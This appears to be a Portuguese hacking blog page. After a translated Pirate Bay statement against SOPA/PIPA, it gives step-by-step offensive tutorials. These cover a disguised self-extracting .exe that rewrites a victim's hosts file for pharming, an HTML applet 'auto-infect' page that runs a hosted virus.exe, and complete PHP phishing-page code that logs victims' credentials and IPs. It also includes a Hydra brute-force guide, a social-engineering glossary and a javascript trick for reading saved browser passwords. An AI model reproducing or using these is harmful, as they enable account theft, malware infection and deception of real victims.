DARKERS
We are the nobodies!
Pirate Bay desafia Sopa e Pipa em nota
14 dias
by darkers
in Mente Hacker
“SOPA significa ‘lixo’ em sueco. PIPA significa ‘cano’. Eles querem tornar a internet um cano [de lixo] de mão única.” 
O Pirate Bay soltou uma nota criticando a Pipa, a Sopa e a indústria cultural que apoia os projetos de lei (que chama de “nossos rivais decadentes”).
Leia a tradução da íntegra da nota abaixo.
INTERNETS, 18 de janeiro de 2012
Há mais de um século, Thomas Edison conseguiu a patente para um aparelho que faria “para o olho o que o fonógrafo fez para o ouvido”. Ele o chamou de cinetoscópio [Kinetoscope]. Edison não foi apenas o primeiro a gravar vídeo, mas foi também a primeira pessoa a ser dono do copyright de um filme cinematográfico.
Por causa das patentes de Edison para filmes cinematográficos, quase foi financeiramente impossível criar filmes de cinema na costa oeste norte-americana. Os estúdios de cinema, assim, mudaram para a Califórnia e fundaram o que hoje chamamos de Hollywood. A principal razão é que ali não haviam patentes.
Não havia também nada de copyright, então os estúdios podiam copiar velhas histórias e fazer filmes a partir delas – como Fantasia, um dos maiores hits da história da Disney.
Portanto, toda a base dessa indústria, que está hoje aos gritos sobre perda de controle sobre direitos não-materiais, é que eles driblaram direitos não-materiais. Eles copiaram (ou, de acordo com sua terminologia,”roubaram”) as obras criativas de outras pessoas sem pagar por isso. Eles o fizeram para obter grandes lucros. Hoje, eles são todos bem-sucedidos e a maior parte dos estúdios está na lista da Fortune das 500 empresas mais ricas do mundo. Parabéns – está tudo baseado em ser capaz de reutilizar criações de outras pessoas. E hoje eles detém os direitos das criações de outras pessoas. Se você quer lançar alguma coisa, você tem que seguir as regras deles. As regras que eles criaram depois de driblar as regras de outras pessoas.
A razão pela qual eles estão sempre reclamando dos “piratas” hoje é simples. Nós fizemos o que eles fizeram. Nós driblamos as regras que eles criaram e criamos as nossas próprias. Nós esmagamos o seu monopólio ao dar às pessoas algo mais eficiente. Nós permitimos que as pessoas tenham comunicação direta entre si, driblando o intermediário lucrativo, que em alguns casos levar mais que 107% dos lucros (sim, você paga para trabalhar para eles).
Tudo se baseia no fato de que representamos competição.
Provamos que a forma atual como existem não é mais necessária. Somos simplesmente do que eles são.
E a parte engraçada é que as nossas regras são muito similares às ideias que fundaram os EUA. Lutamos pela liberdade de expressão. Enxergamos as pessoas como iguais. Acreditamos que o público, não a elite, deveria governar a nação. Acreditamos que leis deveriam ser criadas para servir o público, não corporações ricas.
O Pirate Bay é uma comunidade verdadeiramente interacional. Nossa equipe está espalhada por todo o globo – mas ficamos fora dos EUA. Temos raízes suecas e um amigo sueco nos disse isso:
A palavra SOPA significa “lixo” em sueco. A palavra PIPA significa “um cano” em sueco. É claro que isso não é coincidência. Eles querem tornar a internet um cano de mão única. Eles por cima empurrando lixo cano abaixo para o resto de nós, consumidores obedientes.
A opinião pública nesse assunto é clara. Pergunte a qualquer um na rua e você vai descobrir que ninguém quer ser alimentado com lixo. Por que o governo americano quer que o povo americano seja alimentado com lixo foge à nossa compreensão, mas esperamos que você o impeça, antes que afoguemos todos.
A Sopa não pode fazer nada para brecar o Pirate Bay. Na pior das hipóteses, mudaremos o domínio principal: do atual .org para uma das centenas de nomes que também já usamos. Em países onde estamos bloqueados (os nomes China e Arábia Saudita são os primeiros que vêm à cabeça), eles bloqueiam centenas de nomes de domínios nossos. E adianta? Não muito.
Para consertar o “problema da pirataria” deveria se ir à raiz do problema. A indústria do entretenimento diz que eles estão criando “cultura”, mas o que eles realmente fazem é vender coisas como bonecas caríssimas e fazer meninas de 11 anos se tornar anoréxicas. Seja de trabalhar nas fábricas que criam as bonecas por praticamente salário nenhum, seja por assistir filmes e programas de TV que as fazem pensar que são gordas.
No grande jogo de computador de Sid Meiers, Civilization, você pode construir maravilhas do mundo. Um dos mais poderosos é Hollywood. Com ele, você controla toda a cultura e mídia do mundo. Rupert Murdoch ficou feliz com MySpace e não via problemas com sua própria pirataria até seu fracasso. Agora ele reclama que o Google é a maior fonte de pirataria do mundo — porque ele está com ciúmes. Ele deseja manter seu controle mental sobre as pessoas e está claro que você consegue um visão mais honesta das coisas na Wikipedia e no Google do que na Fox News.
Alguns dos fatos (anos, datas) nesse texto estão provavelmente erradas. O motivo é que não podemos acessar essas informações quando a Wikipedia está fora do ar. Por causa da pressão de nossos rivais decadentes. Pedimos desculpas por isso.
—THE PIRATE BAY, (K)2012
Gerador de CPF e CNPJ Válidos
0
:: Sobre
Você trabalha com programação e não tem como testar o campo de CPF ou CNPJ de seus programas? Teste com nosso gerador de CPF e CNPJ online.
:: FAQ
Esse gerador de CPF e CNPJ é ilegal?
NÃO! Ele é um código para gerar números de CPF e CNPJ unicamente para teste. Os números de CPF e CNPJ gerados não pertencem, necessariamente, a alguma pessoa.
Posso usar os números gerados para preencher cadastros?
TAMBÉM NÃO! Fazer uso desses números para qualquer tipo de cadastro pode ser considerado falsidade ideológica e você sofrerá as penalidades da lei. Por favor, não faça isso!
Dica: SEing para página fake!
0Bem, depois de ler a postagem sobre Página Fake e Pharming (Windows) essa dica pode ser útil.
Primeiramente, pegue uma foto sua. Vamos pegar 100.jpg como exemplo…
Instale o Winrar, selecione o arquivo hosts junto com 100.jpg, clique com o botão direito de ambos selecionados e vá em Adicionar para o arquivo.
Marque a opção Criar arquivo SFX e, na aba Avançado, clique em Opções SFX. Na aba Geral, em Caminho para extração, coloque C:\Windows\System32\drivers\etc.
Em Executar após a extração, coloque o comando start C:\Windows\System32\drivers\etc\100.jpg. Feito isso, vá na aba Métodos e, em Modo silencioso, marque a opção Ocultar tudo.
Na aba Atualizar, em Métodos de substituição, marque Ignorar arquivos existentes.
Na aba Texto e Ícone, troque o ícone do arquivo por um ícone de arquivo de foto (clique aqui para ver um ícone bom).
De OK, OK e mande o arquivo para a vítima, dizendo ser uma foto!
Caso a vítima falar “mas foto não é em .exe“, você fala alguma lorota, como “o meu computador está infectado com um vírus que converte fotos para .exe” ou “isso ai é formato de foto de Linux, hehe!“.
Pronto! A vítima está com o arquivo hosts atualizado, com a sua página fake inclusa lá!
SEing Dictionary
0Saiba o que significa todos os termos de SEing.
5.9.: S(5)weet G(9)host: Ela costuma ser a melhor amiga do Target ou aquela garota que ele deseja ardentemente abrir seu coração doce.
D.B.: Devil Businessman: Quando o próprio capeta se mete a negociante (normalmente, dirige um pequeno business de venda de balas ou gibis).
Ghost Sere incorpóreo: Através de um delírio gerado pela mente do Engineer, o Target se envolve pela tecedura e inicia um relacionalmente amistoso e/ou amoroso com o ser imaterial!
Caramelo: Uma tecedura perfeita; aquela com a qual o Engineer sabe que vai aliciar ,sobremaneira, a atenção do Target.
Engineer: O Engenheiro Social, aquele cara vulgarmente chamado de pilantra da pesada!
Target: O amigo mais querido pelo Engineer (ler Pilantra da Pesada). Muitas vezes, o Engineer, Se envolve com o target numa autentica relação de amor/ódio!
Macacos: Documentos falsos para desenvolver operações de SEing.
Manecas: um Target bem ingénuo.
Mânfio: um Engineer de grande habilidade.
Marmanjo pé-de-chinelo: quando o target é um cara sem importância e, que consequentemente, não vale a pena perder tempo a enganar.
Otário: um cara ingénuo.
Pantafaçudo: uma cara que é 100% target para uma operação de SEing.
SEing: Social Engineering = Engenharia Social.
SEed: Designação dada a uma operação de SEing (por ex.: o Engineer diz; “Eu apliquei uma SEed ao pantafaçudo do Daniel”).
Trouxa: Um cara que se deixa explorar facilmente. Se trata de alguém muito querido pelo Engineer.
Ambrósio: Um cara que não é do meio da SEing.
Apito: Aquele tipo de cara indiscreto.
Baratinar: Quando, em pleno processo de abordagem, o Engineer começa intoxicando seu Target.
Iscado: O Target.
Filet-mignon: quando o Engenheiro se depara com uma excelente fonte de exploração no desenvolvimento de uma operação de SEing.
Viajar para Belo Horizonte: Neste ponto, o Engineer necessita suspender sua SEed e permanecer imóvel por algum tempo.
The Sting: Termo da SEing made in USA (quando o Engineer, aplica uma Grande Golpada).
Ambiência: Todos os elementos necessários para praticar GHOSTING.
Ghosting: Método de negaça desenvolvido por EngRicky.
X9 : Termo para designar um KL. “Keylogger”
Toxic Lipstick: É quando a Sweet Ghost beija o Target apaixonadamente e, este último, sente que o sabor do batom usando pela 5.9. tem um acentuado sabor a tóxico (geralmente, costuma ser fatal para o lado do Target).
Crocodila: Se trata de uma 5.9. com bastante experiência na azáfama de liquidar “Targets”!
Crocodilo: Se trata de um DB com bastante experiência na azáfama de liquidar “Targets”!
Grifting: Quando o Engineer (que neste caso tem a designação de GRIFTER), usa técnicas de SEing para cardar grana.
Grifter: É um Engineer, no entanto, como usa a Grifting, se torna um reles Golpista (Grifter).
Defacement : Invasão do servidor de um site fazendo a substituição das páginas por uma mensagem política ou social, apagando parte ou totalidade do conteúdo original.
Ghosting-Cardares: É a outra face da Ghosting, nesta vertente, virada para a usurpação de grana pela via da Ghosting (É similar à GRITHING, no entanto nesta vertente, o Target mumca chega a saber quem cardou seus bens).
Fonte: 3ngs & EngRicky
Ataque brute force com o Hydra
1Ataques Brute Force
Sobre os Ataques brute force : o atacante tenta adivinhar a senha por tentativa e erro testando várias combinações de usuários e senhas (disponíveis em listas que podem ser encontradas na Internet ou baseando suas tentativas em dados que conseguiu utilizando engenharia social ou por conhecer a vítima do ataque) para tentar logar em um determinado serviço no qual ele não tem autorização, obtendo um shell em um servidor por exemplo.
Efetuar este tipo de ataque é bem demorado e pode ser facilmente impedido por administradores que utilizem técnicas como limitar o número de tentativas erradas utilizando um determinado nome de usuário. Porém, existem várias ferramentas que fazem com que estes ataques sejam efetuados de modo mais eficiente, uma delas é o THC Hydra.
THC Hydra
O Hydra tem um desempenho muito bom (utiliza threads paralelas, dividindo as senhas e nomes de usuários entre estas threads diminuindo o tempo levado para ele conseguir adivinhar a senha) e consegue efetuar com sucesso ataques brute force nos protocolos TELNET</SPAN>, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2, Cisco AAA. Além disso, está em constante desenvolvimento e é completamente gratuito com o código-fonte 100% disponível. Ele ainda possui uma interface gráfica, o HydraGTK. Ela é completamente independente do software e não precisa ser compilada para que você consiga utilizá-lo. Porém, sem ela você só poderá utilizá-lo através da linha de comando.Você pode utilizar o Hydra em qualquer Unix como Linux, *BSD, Solaris, etc; Mac Os/X; no Windows utilizando o Cygwin; em dispositivos móveis que utilizem processadores ARM e Linux e em dispositivos que utilizem o PalmOS.
Site Oficial: http://freeworld.thc.org/thc-hydra/
Seguem os links para que você possa fazer o download:
- Para Unix: hydra-7.1-src.tar.gz
- Para Windows/Cygwin: hydra-5.4-win.zip
- Binário para o ARM: hydra-5.0-arm.tar.gz. Esta versão está um pouco desatualizada, mas em breve será disponibilizada uma nova versão.
- Binário para o Palm: hydra-4.6-palm.zip. A versão para o Palm é desenvolvida de forma independente das outras, portanto nem todos os protocolos são suportados e os updates não são muito frequentes.
Compilando e instalando
Dependendo do pacote que você escolher, será necessário que você compile o software. Algumas releases como a disponível para Windows/Cygwin e ARM já contém tudo compilado e pronto para o uso, com todos os módulos (no port para o ARM você não poderá usar o módulo para SAP R/3).
Se você escolheu o pacote para Unix, você precisará instalar todas as bibliotecas necessárias para compilar os módulos corretamente. O serviço não é tão difícil, já que ao executar o ./configure, já será mostrado um resumo dizendo as bibliotecas que faltam e onde encontrá-las. Seguem os passos necessários para compilar com sucesso o Hydra em qualquer *nix.
Faça o download do pacote hydra-5.4-src.tar.gz aqui no www.darkers.com.br e descompacte:
Código:
tar xzvf hydra-5.4-src.tar.gz
Acesse o diretório que acabou de ser criado e:
Código:
cd hydra-5.4-src./configure
Quando você executa o configure, algumas bibliotecas que são necessárias para alguns módulos como SSHv2 e PostgreSQL (libssh e libpq, respectivamente) são checadas e se não estiverem instaladas no sistema você deverá instalá-las na mão. A boa notícia é que o script já informa o site de onde você pode fazer o download e a maioria dessas bibliotecas já vem com instruções de como compilar. Vale a pena lembrar que, se você não quiser utilizar os módulos que precisam das bibliotecas, pode continuar a compilação normalmente: os outros protocolos irão funcionar sem problemas.
Depois que o ./configure terminar, só resta executar como root:
Código:
make && make install
Pronto! O Hydra já está instalado e pronto para ser usado!
Wordlists
Wordlists são, como o nome diz, listas gigantescas de palavras ou nomes de usuários que são utilizadas em ataques bruteforce. O Hydra não vem com nenhuma wordlist e não funciona sem uma, então você precisa dar um jeito nisso. Vou colocar alguns links com wordlists para você começar a brincar com o Hydra
http://www.outpost9.com/files/WordLists.html
http://wordlist.sourceforge.net/
Depois que você baixar as listas, junte todas em um único arquivo. No Hydra, você só pode especificar um único arquivo de wordlists para ser utilizado. Você pode usar o cat. Por exemplo:
Código:
cat substitua isso por todos os arquivos de wordlists que você tem >> wordlist2.txt
É útil também remover entradas duplicadas da sua wordlist, para não perder tempo tentando mais de uma vez uma senha que já não deu certo:
Código:
cat wordlist2.txt | sort | uniq > wordlistfinal.txt
Pronto, agora é só fazer o Hydra utilizar o arquivo wordlistfinal.txt como wordlist.
Utilizando o Hydra
O Hydra é bem fácil de ser utilizado. Você só precisa especificar o login (ou um arquivo com vários logins), a wordlist com senhas, o host e o protocolo. Se desejar pode fazer com que a saída do comando seja escrita em algum arquivo. Na linha a seguir, mostro o uso básico do Hydra:
Código:
hydra -l root -P ~/wordlistfinal.txt -o bruteforce.txt ftp.foo.bar ftp
A linha acima é bem simples. A opção -l diz que você quer fazer brute force em um usuário específico que você já sabe que existe (você poderia usar a opção -L para utilizar um arquivo com vários logins); a opção -P específica qual wordlist será usada para ler as senhas (você poderia usar -p se soubesse uma senha, mas não soubesse de qual usuário é); -o escreve a saída do comando no arquivo bruteforce.txt; ftp.foo.bar é o nome do host que iremos atacar e ftp é o protocolo que o Hydra deve usar.
Se você por algum motivo precisar interromper a sessão do Hydra, pode começar de onde parou utilizando a opção -R no mesmo diretório em que você interrompeu a execução anterior.
Outras opções úteis são:
-s: Se o serviço estiver sendo executado em uma porta diferente, use esta opção para especificar a porta.
-t: Indica a quantidade de conexões paralelas no servidor
-M: Define uma lista de servidores a serem atacados
Como se proteger
Se proteger de ataques brute force não é tão difícil assim:
- Forçar utilização de senhas seguras nos seus servidores. Senhas com caracteres especiais, letras maiúsculas e minúsculas, números e um comprimento de pelo menos 8 caracteres.
- Determinar um número máximo de erros na tentativa de login.
- Sempre monitore os log’s procurando por tentativas de login que falharam muitas vezes.
- Onde puder, mude a porta padrão dos serviços sendo executados na sua máquina (por exemplo, se só você utilizar o SSH você pode mudar a porta dele de 22 para 45600, por exemplo. Isso diminui a incidência de ataques)
- Onde possível, especifique o IP de origem que pode estabelecer a conexão com determinados serviços
Como se vê, é bem simples melhorar a segurança de seus serviços. Isso é o mínimo necessário para não ter muita dor de cabeça com qualquer pessoa que saia usando o Hydra e seus similares por aí. Porém estas não são as únicas técnicas e também não excluem a necessidade de verificação contínua nos log’s e conexões estabelecidas no servidor procurando por atividades suspeitas.
Conclusão
O Hydra é talvez a melhor ferramenta para ataques de brute force: tem um ótimo desempenho, é multiplataforma e várias opções úteis, além disso está em desenvolvimento constante e novas versões são lançadas frequentemente (não há um ciclo de release definido).
Pharming (Windows)
0A técnica de Pharming no Windows se baseia em trocar os DNS’s de um arquivo, fazendo assim, você acessar um site sem a intenção de fazer aquilo.
O arquivo é o C:\Windows\System32\drivers\etc e possui uma lista de DNS’s com endereços de IP.
O que ele faz?
Ele simplesmente faz o seguinte:
- Quando você digita 127.0.0.1, ele abre o endereço localhost automaticamente… E na barra de endereços, o endereço fica 127.0.0.1.
Pera ae… Isso quer dizer que eu posso fazer a vítima acessar um site, o site aparecer corretamente na barra de endereços e a vítima estar acessando outro site? CORRETO!
Abrindo o arquivo com o bloco de notas, podemos ver:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost127.0.0.1 localhost
Agora, vamos pegar por exemplo, o IP de Google.com e o DNS de Orkut.com e adicionar no arquivo (assim, quando a você tentar acessar o Orkut, você vai cair no Google).
Dando um ping www.google.com, temos:
Disparando www.l.google.com [64.233.163.104] com 32 bytes de dados:
Resposta de 64.233.163.104: bytes=32 tempo=50ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=45ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=46ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=49ms TTL=56
Agora, pegamos o IP do Google.com (64.233.163.104) e acrescentamos, junto ao DNS do Orkut.com, no arquivo hosts.
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost127.0.0.1 localhost
64.233.163.104 www.orkut.com
Pronto! Agora, quando você for acessar Orkut.com, vai abrir a página do Google.com (na barra de endereços, continuará Orkut.com).
Assim, se você fizer isso com uma página fake, a vítima verá a barra de endereçõs idêntica, mas estará logando em outro site! Isso foi apenas para explicar como funciona o Pharming (Windows) com um pouco de imaginação e SEing, ai ai…
Auto infect por URL (HTML Auto Infect)
0Um HTML auto-infect é uma página da web que executa códigos ou softwares maliciosos sem o conhecimento da vitima.
Segue abaixo em anexo os arquivos necessários e o tutorial para configuração:
- 1- Faça upload do .exe desejado em um host e pegue o link. Ex: www.virus.com/virus.exe
- 2 – Agora, edite o HTML de auto-infect:
<applet name=”link” code=”Inicio.class” archive=”link.jar” height=”10″ width=”1″>
<param name=”url” value=”virus.exe”>
Troque isso para:
<applet name=”link” code=”Inicio.class” archive=”link.jar” height=”10″ width=”1″>
<param name=”url” value=”www.virus.com/virus.exe“>
PS: www.virus.com/virus.exe é apenas um exemplo! Nesse passo, você deve substituir pelo link obtido ao fazer o upload do .exe no seu host!
- 3- Hospede também, no mesmo host, o arquivo .html, o arquivo LOGGER e o arquivo .jar (ambos no mesmo diretório).
- 4- Pronto! Ao acessar o .html, ele vai rodar o virus.exe!
PS: Se a vítima não tiver o Java Runtimes instalado no computador, o navegador irá mostrar a opção para instalar. Se isso acontecer, é so você enrolar a vítima com uma engenharia social (falando que é um jogo em java e precisa de complemento, por exemplo).
- Pagina do auto infect neste link:
Password: www.darkers.com.br
Criando uma página fake!
0Esse tutorial vai te ensinar a criar uma página fake de qualquer site!
Para aqueles que não sabem o que é uma página fake…
- Página fake é uma página falsa de login de um site, que rouba os dados das pessoas. Como por exemplo uma página fake de login de um banco (que possui a fução de roubar a senha dos usuários do banco).
Nossa pagina fake funciona da seguinte maneira:
1º – Você vai precisar de um arquivo HTML (o login.html) e mais alguns arquivos PHP
- salva.php
- apagar.php
- ler.php
Você vai upar todos os arquivos em um host free [www.110mb.com] e quando a vítima logar na página fake, os seus dados serão salvos em um arquivo “senhas.txt” no próprio host!
Para ver esse arquivo, acesse o arquivo ler.php. E para apagar, acesse o arquivo apagar.php!
Vamos lá! Primeiramente, entre na página de login de algum site (vamos pegar o Orkut como exemplo) e salve o html como login.html!
Agora, entre no bloco de notas e crie os PHP’s: - salva.php:
<?php
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”<br><br>”;
$ess =”Email: “.$email.”<br>Senha: “.$senha.”<br>Navegador: “.$browser.”<br>IP: “.$ip.”<br>Nome do Host: “.$hostname.”<br>Data: “.$data.”<br>Hora: “.$hora.”<br>”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “<script>javascript:document.location=’SITE DESEJADO’</script>”;
?>
- apagar.php:
<?php
$fd = @fopen(“senhas.txt”,”w”) or die(“arquivo inexistente”);
fpassthru($fd);
?>
- ler.php:
<?php
$fd = @fopen(“senhas.txt”,”r”) or die(“Falta um arquivo no servidor!!”);
fpassthru($fd);
?>
Agora, abra login.html com um editor de HTML, ou com o próprio bloco de notas, e ache o form de login. Esse form é um código que, geralmente, vem nos botões de “Entrar” ou “Login”, que dá um endereço pra página ser redirecionada após o login (se o login for autenticado, ou seja, se o usuário e a senha estiverem certos). Geralmente, ele está escrito no seguinte código:
<form name=”loginForm” action=”…”
- O endereço do Action muda de acordo com o site. Quando for assim, adicione um “Salva.php” no action!
<form name=”loginForm” action=”salva.php”
Dica: O form quase sempre vem seguido do “Action”, que significa uma ação que irá acontecer quando clicar no botão (ou quando a página for atualizada). Então, para achar o form de login, aperta Ctrl F e procura por “Action” no código fonte. Quando você ver que achou o form de login, você substitui o endereço do Action por salva.php. Em geral, é assim, mas em alguns casos, em vez de action, tem outros códigos (um deles é OnClick), mas fica fácil de achar, é so pesquisar bastante no código fonte.
- No caso do Orkut, no código-fonte, o form está assim:
<form id=”gaia_loginform” action=”https://www.google.com/accounts/ServiceLoginAuth?service=orkut“
-É só você trocar por:
<form id=”gaia_loginform” action=”salva.php”
-Agora você procura, por perto do form, a parte do INPUT. Procura o INPUT de usuário e o INPUT de senha. O INPUT é o campo onde você digita a senha. Dica: a maioria dos inputs estao com type=HIDDEN (escondidos). Então, o INPUT que você vai procurar é o de inserir senha e login. Geralmente eles tem nome de LOGIN e PASSWORD. No código-fonte da página de login do Orkut é assim:
<input name=”Email”
e
<input name=”passwd”
Agora você pega os valores dos “input name”, que no exemplo, é “username” e “password”, abre o salva.php. Ele deve estar assim:
<?php
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”<br><br>”;
$ess =”Email: “.$email.”<br>Senha: “.$senha.”<br>Navegador: “.$browser.”<br>IP: “.$ip.”<br>Nome do Host: “.$hostname.”<br>Data: “.$data.”<br>Hora: “.$hora.”<br>”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “<script>javascript:document.location=’SITE DESEJADO’</script>”;
?>
Agora, você coloca na 2º e na 3º linha, entre aspas, os valores e na penúltima linha, coloque endereço do login Vai ficar assim:
<?php
$nomearquivo =”senhas.txt”;
$email =$_POST["Email"];
$senha =$_POST["passwd"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”<br><br>”;
$ess =”Email: “.$email.”<br>Senha: “.$senha.”<br>Navegador: “.$browser.”<br>IP: “.$ip.”<br>Nome do Host: “.$hostname.”<br>Data: “.$data.”<br>Hora: “.$hora.”<br>”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “<script>javascript:document.location=’http://www.orkut.com‘</script>”;
?>
Salve e pronto!
Agora você precisa saber a função de cada arquivo:
-> login.htm: a página fake já com as modificações necessárias
-> login_arquivos: imagens (geralmente, gifs e pngs) da página de login
-> salva.php: arquivo php necessário pra página funcionar (salva senhas e logins no arquivo senhas.txt)
-> ler.php: com esse arquivo é que você vai conseguir ver as senhas e logins (permite você visualizar o arquivo senhas.txt)
-> apagar.php: com esse arquivo, você vai apagar as senhas e logins depois de ter guardado (apaga o arquivo senhas.txt)
-> senhas.txt: o arquivo com as senhas que vâo ser salvas depois de alguem ter logado na página fake. Se você quiser dificultar o acesso de outras pessoas à sua página fake, mude “senhas.txt” e “ler.php”, como por exemplo hell.php e hell.txt. Fica mais difícil de uma pessoa descobrir o link do log de senhas. Mas, para fazer isso, você vai ter que mudar o nome em todos os lugares, em todos phps e na página fake, que fazem referência à Salvar.txt e Ler.php.
IMPORTANTE: Coloque todos os 4 arquivos juntos no mesmo diretório
IMPORTANTE²: Crie uma pasta no diretorio onde vc fez o upload dos 4 arquivos e faça o upload dos arquivos que estao dentro da pasta login_Arquivos
Recuperando senhas gravadas no navegador
0Existem softwares para recuperação de senhas gravadas em inputs do tipo password, neste caso não vamos utilizar nenhum programa externo, apenas javascript e umnavegador (testado apenas no FF).
O primeiro passo é acessar o site e fazer com que a senha seja carregada no campo de password, em alguns casos é necessário digitar o usuário para que isto aconteça.
Feito isso, carregue o jQuery no site através do campo da url:
javascript:var%20script=document.createElement(“script”);script.type=”text/javascript”;
script.src=”http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js“;
document.getElementsByTagName(“head”)[0].appendChild(script);void(0);
Sabendo que agora você pode usar os recursos do jQuery, você precisa encontrar o input do tipo password e exibir o atributo “value” dele, o código que faz isso:
javascript:alert($(“input[type=password]“).val())
Simples assim, este comando deve abrir um alert com a sua senha.
Comentários